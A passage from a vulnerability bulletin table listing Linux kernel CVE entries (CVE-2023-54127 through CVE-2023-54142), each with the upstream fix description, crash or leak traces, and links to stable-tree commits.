entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] </TASK> Allocated by task 13352: kasan_save_stack mm/kasan/common.c:45 [inline] kasan_set_track+0x3d/0x60 mm/kasan/common.c:52 ____kasan_kmalloc mm/kasan/common.c:371 [inline] __kasan_kmalloc+0x97/0xb0 mm/kasan/common.c:380 kmalloc include/linux/slab.h:580 [inline] dbMount+0x54/0x980 fs/jfs/jfs_dmap.c:164 jfs_mount+0x1dd/0x830 fs/jfs/jfs_mount.c:121 jfs_fill_super+0x590/0xc50 fs/jfs/super.c:556 mount_bdev+0x26c/0x3a0 fs/super.c:1359 legacy_get_tree+0xea/0x180 fs/fs_context.c:610 vfs_get_tree+0x88/0x270 fs/super.c:1489 do_new_mount+0x289/0xad0 fs/namespace.c:3145 do_mount fs/namespace.c:3488 [inline] __do_sys_mount fs/namespace.c:3697 [inline] __se_sys_mount+0x2d3/0x3c0 fs/namespace.c:3674 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Freed by task 13352: kasan_save_stack mm/kasan/common.c:45 [inline] kasan_set_track+0x3d/0x60 mm/kasan/common.c:52 kasan_save_free_info+0x27/0x40 mm/kasan/generic.c:518 ____kasan_slab_free+0xd6/0x120 mm/kasan/common.c:236 kasan_slab_free include/linux/kasan.h:177 [inline] slab_free_hook mm/slub.c:1781 [inline] slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807 slab_free mm/slub.c:3787 [inline] __kmem_cache_free+0x71/0x110 mm/slub.c:3800 dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264 jfs_mount_rw+0x545/0x740 fs/jfs/jfs_mount.c:247 jfs_remount+0x3db/0x710 fs/jfs/super.c:454 reconfigure_super+0x3bc/0x7b0 fs/super.c:935 vfs_fsconfig_locked fs/fsopen.c:254 [inline] __do_sys_fsconfig fs/fsopen.c:439 [inline] __se_sys_fsconfig+0xad5/0x1060 fs/fsopen.c:314 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] JFS_SBI(ipbmap->i_sb)->bmap wasn't set to NULL after kfree() in dbUnmount(). Syzkaller uses faultinject to reproduce this KASAN double-free warning. The issue is triggered if either diMount() or dbMount() fail in jfs_remount(), since diUnmount() or dbUnmount() already happened in such a case - they will do double-free on next execution: jfs_umount or jfs_remount. Tested on both upstream and jfs-next by syzkaller. | 2025-12-24 | not yet calculated | CVE-2023-54127 | https://git.kernel.org/stable/c/798c5f6f98bc9045593d4b3a65c32f05d97bd0e6 https://git.kernel.org/stable/c/aef6507e85475e30831c30405d785c7ed976ea4a https://git.kernel.org/stable/c/b12ccbfdf6539ef0157868f69fcae0b7f7a072b3 https://git.kernel.org/stable/c/6f8b34458948ffca2fe90cd8c614e3fa2ebe0b27 https://git.kernel.org/stable/c/aa5b019a3e0f7f54f4e5370c1af827f6b00fd26b https://git.kernel.org/stable/c/2f7a36448f51d08d3a83f1514abcca4b680bcd3c https://git.kernel.org/stable/c/f71c4bb3ec08dfcbd201350a6a0a914c4e6a9e3f https://git.kernel.org/stable/c/cade5397e5461295f3cb87880534b6a07cafa427 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: drop peer group ids under namespace lock When cleaning up peer group ids in the failure path we need to make sure to hold on to the namespace lock. Otherwise another thread might just turn the mount from a shared into a non-shared mount concurrently. | 2025-12-24 | not yet calculated | CVE-2023-54128 | https://git.kernel.org/stable/c/0af8fae81d8b7f1beddc17c5d4cfa43235134648 https://git.kernel.org/stable/c/ddca03d97daa7b07b60c52e3d3060762732c6666 https://git.kernel.org/stable/c/65c324d3f35c05e37afec39ac80743583fdcc96c https://git.kernel.org/stable/c/cb2239c198ad9fbd5aced22cf93e45562da781eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Add validation for lmac type Upon physical link change, firmware reports to the kernel about the change along with the details like speed, lmac_type_id, etc. Kernel derives lmac_type based on lmac_type_id received from firmware. In a few scenarios, firmware returns an invalid lmac_type_id, which is resulting in below kernel panic. This patch adds the missing validation of the lmac_type_id field. Internal error: Oops: 96000005 [#1] PREEMPT SMP [ 35.321595] Modules linked in: [ 35.328982] CPU: 0 PID: 31 Comm: kworker/0:1 Not tainted 5.4.210-g2e3169d8e1bc-dirty #17 [ 35.337014] Hardware name: Marvell CN103XX board (DT) [ 35.344297] Workqueue: events work_for_cpu_fn [ 35.352730] pstate: 40400089 (nZcv daIf +PAN -UAO) [ 35.360267] pc : strncpy+0x10/0x30 [ 35.366595] lr : cgx_link_change_handler+0x90/0x180 | 2025-12-24 | not yet calculated | CVE-2023-54129 | https://git.kernel.org/stable/c/83a7f27c5b94e43f29f8216a32790751139aa61e https://git.kernel.org/stable/c/afd7660c766c4d317feae004e5cd829390bbc4b0 https://git.kernel.org/stable/c/5c0268b141ad612b6fca13d3a66cfda111716dbb https://git.kernel.org/stable/c/cb5edce271764524b88b1a6866b3e626686d9a33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs/hfsplus: avoid WARN_ON() for sanity check, use proper error handling Commit 55d1cbbbb29e ("hfs/hfsplus: use WARN_ON for sanity check") fixed a build warning by turning a comment into a WARN_ON(), but it turns out that syzbot then complains because it can trigger said warning with a corrupted hfs image. The warning actually does warn about a bad situation, but we are much better off just handling it as the error it is. So rather than warn about us doing bad things, stop doing the bad things and return -EIO. While at it, also fix a memory leak that was introduced by an earlier fix for a similar syzbot warning situation, and add a check for one case that historically wasn't handled at all (ie neither comment nor subsequent WARN_ON). | 2025-12-24 | not yet calculated | CVE-2023-54130 | https://git.kernel.org/stable/c/cc2164ada548addfa8ee215196661c3afe0c5154 https://git.kernel.org/stable/c/82725be426bce0a425cc5e26fbad61ffd29cff03 https://git.kernel.org/stable/c/da23752d9660ba7a8ca6c5768fd8776f67f59ee7 https://git.kernel.org/stable/c/be01f35efa876eb81cebab2cb0add068b7280ef4 https://git.kernel.org/stable/c/f10defb0be6ac42fb6a97b45920d32da6bd6fde8 https://git.kernel.org/stable/c/90e019006644dad35862cb4aa270f561b0732066 https://git.kernel.org/stable/c/45917be9f0af339a45b4619f31c902d37b8aed59 https://git.kernel.org/stable/c/cb7a95af78d29442b8294683eca4897544b8ef46 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rt2x00: Fix memory leak when handling surveys When removing a rt2x00 device, its associated channel surveys are not freed, causing a memory leak observable with kmemleak: unreferenced object 0xffff9620f0881a00 (size 512): comm "systemd-udevd", pid 2290, jiffies 4294906974 (age 33.768s) hex dump (first 32 bytes): 70 44 12 00 00 00 00 00 92 8a 00 00 00 00 00 00 pD.............. 00 00 00 00 00 00 00 00 ab 87 01 00 00 00 00 00 ................ backtrace: [<ffffffffb0ed858b>] __kmalloc+0x4b/0x130 [<ffffffffc1b0f29b>] rt2800_probe_hw+0xc2b/0x1380 [rt2800lib] [<ffffffffc1a9496e>] rt2800usb_probe_hw+0xe/0x60 [rt2800usb] [<ffffffffc1ae491a>] rt2x00lib_probe_dev+0x21a/0x7d0 [rt2x00lib] [<ffffffffc1b3b83e>] rt2x00usb_probe+0x1be/0x980 [rt2x00usb] [<ffffffffc05981e2>] usb_probe_interface+0xe2/0x310 [usbcore] [<ffffffffb13be2d5>] really_probe+0x1a5/0x410 [<ffffffffb13be5c8>] __driver_probe_device+0x78/0x180 [<ffffffffb13be6fe>] driver_probe_device+0x1e/0x90 [<ffffffffb13be972>] __driver_attach+0xd2/0x1c0 [<ffffffffb13bbc57>] bus_for_each_dev+0x77/0xd0 [<ffffffffb13bd2a2>] bus_add_driver+0x112/0x210 [<ffffffffb13bfc6c>] driver_register+0x5c/0x120 [<ffffffffc0596ae8>] usb_register_driver+0x88/0x150 [usbcore] [<ffffffffb0c011c4>] do_one_initcall+0x44/0x220 [<ffffffffb0d6134c>] do_init_module+0x4c/0x220 Fix this by freeing the channel surveys on device removal. Tested with a RT3070 based USB wireless adapter. | 2025-12-24 | not yet calculated | CVE-2023-54131 | https://git.kernel.org/stable/c/eb77c0c0a17c53d83b5fe8e46490fb0a7ed9e6af https://git.kernel.org/stable/c/bea3f8aa999318bdffa2d17753e492f76904f0ce https://git.kernel.org/stable/c/494064ffd60d044c097d514917c40913d1affbca https://git.kernel.org/stable/c/0354bce76ed1d775904acdb4cc0bf88c5b9b5b9f https://git.kernel.org/stable/c/cbef9a83c51dfcb07f77cfa6ac26f53a1ea86f49 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: stop parsing non-compact HEAD index if clusterofs is invalid Syzbot generated a crafted image [1] with a non-compact HEAD index of clusterofs 33024 while valid numbers should be 0 ~ lclustersize-1, which causes the following unexpected behavior as below: BUG: unable to handle page fault for address: fffff52101a3fff9 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 23ffed067 P4D 23ffed067 PUD 0 Oops: 0000 [#1] PREEMPT SMP KASAN CPU: 1 PID: 4398 Comm: kworker/u5:1 Not tainted 6.3.0-rc6-syzkaller-g09a9639e56c0 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023 Workqueue: erofs_worker z_erofs_decompressqueue_work RIP: 0010:z_erofs_decompress_queue+0xb7e/0x2b40 ... Call Trace: <TASK> z_erofs_decompressqueue_work+0x99/0xe0 process_one_work+0x8f6/0x1170 worker_thread+0xa63/0x1210 kthread+0x270/0x300 ret_from_fork+0x1f/0x30 Note that normal images or images using compact indexes are not impacted. Let's fix this now. [1] https://lore.kernel.org/r/000000000000ec75b005ee97fbaa@google.com | 2025-12-24 | not yet calculated | CVE-2023-54132 | https://git.kernel.org/stable/c/880c79bdb002b9d5b6940e52c2ad3829c2178207 https://git.kernel.org/stable/c/7a4579cd6e4936de107c82499c3c9ee11b63401e https://git.kernel.org/stable/c/060fecf1114ff9fcfe87953fe8c4fc5048777160 https://git.kernel.org/stable/c/7ee7a86e28ce9ead7112286c388df8d254c373c6 https://git.kernel.org/stable/c/f01b2894928affa3339d355608713cf3db8360b8 https://git.kernel.org/stable/c/96a845419b3722869f09883319de4d55c44d9aef https://git.kernel.org/stable/c/cc4efd3dd2ac9f89143e5d881609747ecff04164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfp: clean mc addresses in application firmware when closing port When moving devices from one namespace to another, mc addresses are cleaned in software while not removed from application firmware. Thus the mc addresses are remained and will cause resource leak. Now use `__dev_mc_unsync` to clean mc addresses when closing port. | 2025-12-24 | not yet calculated | CVE-2023-54133 | https://git.kernel.org/stable/c/c427221733d49fd1e1b79b4a86746acf3ef660e7 https://git.kernel.org/stable/c/cc7eab25b1cf3f9594fe61142d3523ce4d14a788 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: autofs: fix memory leak of waitqueues in autofs_catatonic_mode Syzkaller reports a memory leak: BUG: memory leak unreferenced object 0xffff88810b279e00 (size 96): comm "syz-executor399", pid 3631, jiffies 4294964921 (age 23.870s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 08 9e 27 0b 81 88 ff ff ..........'..... 08 9e 27 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ..'............. backtrace: [<ffffffff814cfc90>] kmalloc_trace+0x20/0x90 mm/slab_common.c:1046 [<ffffffff81bb75ca>] kmalloc include/linux/slab.h:576 [inline] [<ffffffff81bb75ca>] autofs_wait+0x3fa/0x9a0 fs/autofs/waitq.c:378 [<ffffffff81bb88a7>] autofs_do_expire_multi+0xa7/0x3e0 fs/autofs/expire.c:593 [<ffffffff81bb8c33>] autofs_expire_multi+0x53/0x80 fs/autofs/expire.c:619 [<ffffffff81bb6972>] autofs_root_ioctl_unlocked+0x322/0x3b0 fs/autofs/root.c:897 [<ffffffff81bb6a95>] autofs_root_ioctl+0x25/0x30 fs/autofs/root.c:910 [<ffffffff81602a9c>] vfs_ioctl fs/ioctl.c:51 [inline] [<ffffffff81602a9c>] __do_sys_ioctl fs/ioctl.c:870 [inline] [<ffffffff81602a9c>] __se_sys_ioctl fs/ioctl.c:856 [inline] [<ffffffff81602a9c>] __x64_sys_ioctl+0xfc/0x140 fs/ioctl.c:856 [<ffffffff84608225>] do_syscall_x64 arch/x86/entry/common.c:50 [inline] [<ffffffff84608225>] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 [<ffffffff84800087>] entry_SYSCALL_64_after_hwframe+0x63/0xcd autofs_wait_queue structs should be freed if their wait_ctr becomes zero. Otherwise they will be lost. In this case an AUTOFS_IOC_EXPIRE_MULTI ioctl is done, then a new waitqueue struct is allocated in autofs_wait(), its initial wait_ctr equals 2. After that wait_event_killable() is interrupted (it returns -ERESTARTSYS), so that 'wq->name.name == NULL' condition may be not satisfied. Actually, this condition can be satisfied when autofs_wait_release() or autofs_catatonic_mode() is called and, what is also important, wait_ctr is decremented in those places. Upon the exit of autofs_wait(), wait_ctr is decremented to 1. Then the unmounting process begins: kill_sb calls autofs_catatonic_mode(), which should have freed the waitqueues, but it only decrements its usage counter to zero which is not a correct behaviour. edit:imk This description is of course not correct. The umount performed as a result of an expire is a umount of a mount that has been automounted, it's not the autofs mount itself. They happen independently, usually after everything mounted within the autofs file system has been expired away. If everything hasn't been expired away the automount daemon can still exit leaving mounts in place. But expires done in both cases will result in a notification that calls autofs_wait_release() with a result status. The problem case is the summary execution of of the automount daemon. In this case any waiting processes won't be woken up until either they are terminated or the mount is umounted. end edit: imk So in catatonic mode we should free waitqueues which counter becomes zero. edit: imk Initially I was concerned that the calling of autofs_wait_release() and autofs_catatonic_mode() was not mutually exclusive but that can't be the case (obviously) because the queue entry (or entries) is removed from the list when either of these two functions are called. Consequently the wait entry will be freed by only one of these functions or by the woken process in autofs_wait() depending on the order of the calls. end edit: imk | 2025-12-24 | not yet calculated | CVE-2023-54134 | https://git.kernel.org/stable/c/1985e8eae8627f02e3364690c5fed7af1c46be55 https://git.kernel.org/stable/c/976abbdc120a97049b9133e60fa7b29627d11de4 https://git.kernel.org/stable/c/6079dc77c6f32936e8a6766ee8334ae3c99f4504 https://git.kernel.org/stable/c/69ddafc7a7afd8401bab53eff5af813fa0d368a2 https://git.kernel.org/stable/c/71eeddcad7342292c19042c290c477697acaccab https://git.kernel.org/stable/c/726deae613bc1b6096ad3b61cc1e63e33330fbc2 https://git.kernel.org/stable/c/696b625f3f85d80fca48c24d2948fbc451e74366 https://git.kernel.org/stable/c/ccbe77f7e45dfb4420f7f531b650c00c6e9c7507 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: maple_tree: fix potential out-of-bounds access in mas_wr_end_piv() Check the write offset end bounds before using it as the offset into the pivot array. This avoids a possible out-of-bounds access on the pivot array if the write extends to the last slot in the node, in which case the node maximum should be used as the end pivot. akpm: this doesn't affect any current callers, but new users of mapletree may encounter this problem if backported into earlier kernels, so let's fix it in -stable kernels in case of this. | 2025-12-24 | not yet calculated | CVE-2023-54135 | https://git.kernel.org/stable/c/4e2ad53ababeaac44d71162650984abfe783960c https://git.kernel.org/stable/c/dc4751bd4aba01ccfc02f91adfeee0ba4cda405c https://git.kernel.org/stable/c/f5fcf6555a2a4f32947d17b92b173837cc652891 https://git.kernel.org/stable/c/cd00dd2585c4158e81fdfac0bbcc0446afbad26d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: sprd: Fix DMA buffer leak issue Release DMA buffer when _probe() returns failure to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2023-54136 | https://git.kernel.org/stable/c/c65be6ad55e5e45f8c4e40e1d8d7fe0e21b26e77 https://git.kernel.org/stable/c/9a26aaea6c212ea26bab159933dbfd3321a491f6 https://git.kernel.org/stable/c/f34508d934c4f2efb6a85787fc37f42184dabadf https://git.kernel.org/stable/c/6d209ed70f9c388727995aaece1f930fe63d402b https://git.kernel.org/stable/c/0237f913694d57bcd7e0e7ae6f255b648a1c42a7 https://git.kernel.org/stable/c/4ee715e54e255b1be65722f715fca939d5c2ca7a https://git.kernel.org/stable/c/cd119fdc3ee1450fbf7f78862b5de44c42b6e47f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/type1: fix cap_migration information leak Fix an information leak where an uninitialized hole in struct vfio_iommu_type1_info_cap_migration on the stack is exposed to userspace. The definition of struct vfio_iommu_type1_info_cap_migration contains a hole as shown in this pahole(1) output: struct vfio_iommu_type1_info_cap_migration { struct vfio_info_cap_header header; /* 0 8 */ __u32 flags; /* 8 4 */ /* XXX 4 bytes hole, try to pack */ __u64 pgsize_bitmap; /* 16 8 */ __u64 max_dirty_bitmap_size; /* 24 8 */ /* size: 32, cachelines: 1, members: 4 */ /* sum members: 28, holes: 1, sum holes: 4 */ /* last cacheline: 32 bytes */ }; The cap_mig variable is filled in without initializing the hole: static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu, struct vfio_info_cap *caps) { struct vfio_iommu_type1_info_cap_migration cap_mig; cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION; cap_mig.header.version = 1; cap_mig.flags = 0; /* support minimum pgsize */ cap_mig.pgsize_bitmap = (size_t)1 << __ffs(iommu->pgsize_bitmap); cap_mig.max_dirty_bitmap_size = DIRTY_BITMAP_SIZE_MAX; return vfio_info_add_capability(caps, &cap_mig.header, sizeof(cap_mig)); } The structure is then copied to a temporary location on the heap. At this point it's already too late and ioctl(VFIO_IOMMU_GET_INFO) copies it to userspace later: int vfio_info_add_capability(struct vfio_info_cap *caps, struct vfio_info_cap_header *cap, size_t size) { struct vfio_info_cap_header *header; header = vfio_info_cap_add(caps, size, cap->id, cap->version); if (IS_ERR(header)) return PTR_ERR(header); memcpy(header + 1, cap + 1, size - sizeof(*header)); return 0; } This issue was found by code inspection. | 2025-12-24 | not yet calculated | CVE-2023-54137 | https://git.kernel.org/stable/c/ad83d83dd891244de0d07678b257dc976db7c132 https://git.kernel.org/stable/c/13fd667db999bffb557c5de7adb3c14f1713dd51 https://git.kernel.org/stable/c/f6f300ecc196d243c02adeb9ee0c62c677c24bfb https://git.kernel.org/stable/c/cbac29a1caa49a34e131394e1f4d924a76d8b0c9 https://git.kernel.org/stable/c/1b5feb8497cdb5b9962db2700814bffbc030fb4a https://git.kernel.org/stable/c/cd24e2a60af633f157d7e59c0a6dba64f131c0b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix NULL-deref on irq uninstall In case of early initialisation errors and on platforms that do not use the DPU controller, the deinitilisation code can be called with the kms pointer set to NULL. Patchwork: https://patchwork.freedesktop.org/patch/525104/ | 2025-12-24 | not yet calculated | CVE-2023-54138 | https://git.kernel.org/stable/c/e2d1cc82ad509c07a9ab0ab4bf88b6613fbf784b https://git.kernel.org/stable/c/dd8ce825b165acf997689c5ffa45d6a7a1fc0260 https://git.kernel.org/stable/c/bafa985acff9b0ed53957beff33c18be08d6b9a6 https://git.kernel.org/stable/c/72092e34742e8b34accdadfa7bd9a13cf255a531 https://git.kernel.org/stable/c/cd459c005de3e2b855a8cc7768e633ce9d018e9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing/user_events: Ensure write index cannot be negative The write index indicates which event the data is for and accesses a per-file array. The index is passed by user processes during write() calls as the first 4 bytes. Ensure that it cannot be negative by returning -EINVAL to prevent out of bounds accesses. Update ftrace self-test to ensure this occurs properly. | 2025-12-24 | not yet calculated | CVE-2023-54139 | https://git.kernel.org/stable/c/0489c2b2c3104b89f078dbcec8c744dfc157d3e9 https://git.kernel.org/stable/c/4fe46b5adf18e3dc606e62c9e6a0413398a17572 https://git.kernel.org/stable/c/fa7f2f5d1739452280c22727c4384a52b72ab5de https://git.kernel.org/stable/c/cd98c93286a30cc4588dfd02453bec63c2f4acf4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix WARNING in mark_buffer_dirty due to discarded buffer reuse A syzbot stress test using a corrupted disk image reported that mark_buffer_dirty() called from __nilfs_mark_inode_dirty() or nilfs_palloc_commit_alloc_entry() may output a kernel warning, and can panic if the kernel is booted with panic_on_warn. This is because nilfs2 keeps buffer pointers in local structures for some metadata and reuses them, but such buffers may be forcibly discarded by nilfs_clear_dirty_page() in some critical situations. This issue is reported to appear after commit 28a65b49eb53 ("nilfs2: do not write dirty data after degenerating to read-only"), but the issue has potentially existed before. Fix this issue by checking the uptodate flag when attempting to reuse an internally held buffer, and reloading the metadata instead of reusing the buffer if the flag was lost. | 2025-12-24 | not yet calculated | CVE-2023-54140 | https://git.kernel.org/stable/c/473795610594f261e98920f0945550314df36f07 https://git.kernel.org/stable/c/d95e403588738c7ec38f52b9f490b15e7745d393 https://git.kernel.org/stable/c/99a73016a5e12a09586a96f998e91f9ea145cd00 https://git.kernel.org/stable/c/f1d637b63d8a27ac3386f186a694907f2717fc13 https://git.kernel.org/stable/c/b911bef132a06de01a745c6a24172d6db7216333 https://git.kernel.org/stable/c/4da07e958bfda2d69d83db105780e8916e3ac02e https://git.kernel.org/stable/c/46c11be2dca295742a5508ea910a77f7733fb7f4 https://git.kernel.org/stable/c/b308b3eabc429649b5501d36290cea403fbd746c https://git.kernel.org/stable/c/cdaac8e7e5a059f9b5e816cda257f08d0abffacd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Add missing hw_ops->get_ring_selector() for IPQ5018 During sending data after clients connected, hw_ops->get_ring_selector() will be called. But for IPQ5018, this member isn't set, and the following NULL pointer exception will be occurred: [ 38.840478] 8<--- cut here --- [ 38.840517] Unable to handle kernel NULL pointer dereference at virtual address 00000000 ... [ 38.923161] PC is at 0x0 [ 38.927930] LR is at ath11k_dp_tx+0x70/0x730 [ath11k] ... [ 39.063264] Process hostapd (pid: 1034, stack limit = 0x801ceb3d) [ 39.068994] Stack: (0x856a9a68 to 0x856aa000) ... [ 39.438467] [<7f323804>] (ath11k_dp_tx [ath11k]) from [<7f314e6c>] (ath11k_mac_op_tx+0x80/0x190 [ath11k]) [ 39.446607] [<7f314e6c>] (ath11k_mac_op_tx [ath11k]) from [<7f17dbe0>] (ieee80211_handle_wake_tx_queue+0x7c/0xc0 [mac80211]) [ 39.456162] [<7f17dbe0>] (ieee80211_handle_wake_tx_queue [mac80211]) from [<7f174450>] (ieee80211_probereq_get+0x584/0x704 [mac80211]) [ 39.467443] [<7f174450>] (ieee80211_probereq_get [mac80211]) from [<7f178c40>] (ieee80211_tx_prepare_skb+0x1f8/0x248 [mac80211]) [ 39.479334] [<7f178c40>] (ieee80211_tx_prepare_skb [mac80211]) from [<7f179e28>] (__ieee80211_subif_start_xmit+0x32c/0x3d4 [mac80211]) [ 39.491053] [<7f179e28>] (__ieee80211_subif_start_xmit [mac80211]) from [<7f17af08>] (ieee80211_tx_control_port+0x19c/0x288 [mac80211]) [ 39.502946] [<7f17af08>] (ieee80211_tx_control_port [mac80211]) from [<7f0fc704>] (nl80211_tx_control_port+0x174/0x1d4 [cfg80211]) [ 39.515017] [<7f0fc704>] (nl80211_tx_control_port [cfg80211]) from [<808ceac4>] (genl_rcv_msg+0x154/0x340) [ 39.526814] [<808ceac4>] (genl_rcv_msg) from [<808cdb74>] (netlink_rcv_skb+0xb8/0x11c) [ 39.536446] [<808cdb74>] (netlink_rcv_skb) from [<808ce1d0>] (genl_rcv+0x28/0x34) [ 39.544344] [<808ce1d0>] (genl_rcv) from [<808cd234>] (netlink_unicast+0x174/0x274) [ 39.551895] [<808cd234>] (netlink_unicast) from [<808cd510>] (netlink_sendmsg+0x1dc/0x440) [ 39.559362] [<808cd510>] (netlink_sendmsg) from [<808596e0>] (____sys_sendmsg+0x1a8/0x1fc) [ 39.567697] [<808596e0>] (____sys_sendmsg) from [<8085b1a8>] (___sys_sendmsg+0xa4/0xdc) [ 39.575941] [<8085b1a8>] (___sys_sendmsg) from [<8085b310>] (sys_sendmsg+0x44/0x74) [ 39.583841] [<8085b310>] (sys_sendmsg) from [<80300060>] (ret_fast_syscall+0x0/0x40) ... [ 39.620734] Code: bad PC value [ 39.625869] ---[ end trace 8aef983ad3cbc032 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54141 | https://git.kernel.org/stable/c/d1992d72a359732f143cc962917104d193705da7 https://git.kernel.org/stable/c/c36289e3c5e83286974ef68c20c821fd5b63801c https://git.kernel.org/stable/c/ce282d8de71f07f0056ea319541141152c65f552 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gtp: Fix use-after-free in __gtp_encap_destroy(). syzkaller reported use-after-free in __gtp_encap_destroy(). [0] It shows the same process freed sk and touched it illegally. Commit e198987e7dd7 ("gtp: fix suspicious RCU usage") added lock_sock() and release_sock() in __gtp_encap_destroy() to protect sk->sk_user_data, but release_sock() is called after sock_put() releases the last refcnt. [0]: BUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline] BUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline] BUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline] BUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline] BUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178 Write of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401 CPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:351 [inline] print_report+0xcc/0x620 mm/kasan/report.c:462 kasan_report+0xb2/0xe0 mm/kasan/report.c:572 check_region_inline mm/kasan/generic.c:181 [inline] kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187 instrument_atomic_read_write include/linux/instrumented.h:96 [inline] atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline] queued_spin_lock include/asm-generic/qspinlock.h:111 [inline] do_raw_spin_lock include/linux/spinlock.h:186 [inline] __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline] _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178 spin_lock_bh include/linux/spinlock.h:355 [inline] release_sock+0x1f/0x1a0 net/core/sock.c:3526 gtp_encap_disable_sock drivers/net/gtp.c:651 [inline] gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664 gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728 unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841 rtnl_delete_link net/core/rtnetlink.c:3216 [inline] rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268 rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423 netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg+0x1b7/0x200 net/socket.c:747 ____sys_sendmsg+0x75a/0x990 net/socket.c:2493 ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547 __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x7f1168b1fe5d Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48 RSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d RDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003 RBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000 </TASK> Allocated by task 1483: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 __kasan_slab_alloc+0x ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54142 | https://git.kernel.org/stable/c/d38039697184aacff1cf576e14ef583112fdefef https://git.kernel.org/stable/c/e5aa6d829831a55a693dbaeb58f8d22ba7f2b3e6 https://git.kernel.org/stable/c/9c9662e2512b5e4ee7b03108802c5222e0fa77a4 https://git.kernel.org/stable/c/bccc7ace12e69dee4684a3bb4b69737972e570d6 https://git.kernel.org/stable/c/ebd6d2077a083329110695a996c00e8ca94bc640 https://git.kernel.org/stable/c/17d6b6354f0025b7c10a56da783fd0cbb3819c5d https://git.kernel.org/stable/c/dae6095bdb24f537b4798ffd9201515b97bac94e https://git.kernel.org/stable/c/58fa341327fdb4bdf92597fd8796a9abc8d20ea3 